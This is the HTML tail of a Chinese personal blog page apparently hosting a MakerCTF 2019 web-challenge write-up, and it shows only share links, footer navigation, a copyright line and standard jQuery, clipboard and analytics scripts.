  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://blog.frankli.site/2019/04/15/Security/Writeup/MakerCTF%202019/&title=MakerCTF 2019 部分Web题目 Writeup"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://blog.frankli.site/2019/04/15/Security/Writeup/MakerCTF%202019/&title=MakerCTF 2019 部分Web题目 Writeup"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://blog.frankli.site/2019/04/15/Security/Writeup/MakerCTF%202019/&name=MakerCTF 2019 部分Web题目 Writeup&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://blog.frankli.site/2019/04/15/Security/Writeup/MakerCTF%202019/&t=MakerCTF 2019 部分Web题目 Writeup"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2017-2023
    Frank Li
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/friends/">友链</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.3/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

    <script async src="https://www.googletagmanager.com/gtag/js?id=UA-131292248-2"></script>
    <script>
        window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());
        gtag('config', 'UA-131292248-2');
    </script>

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->


</body>
</html>
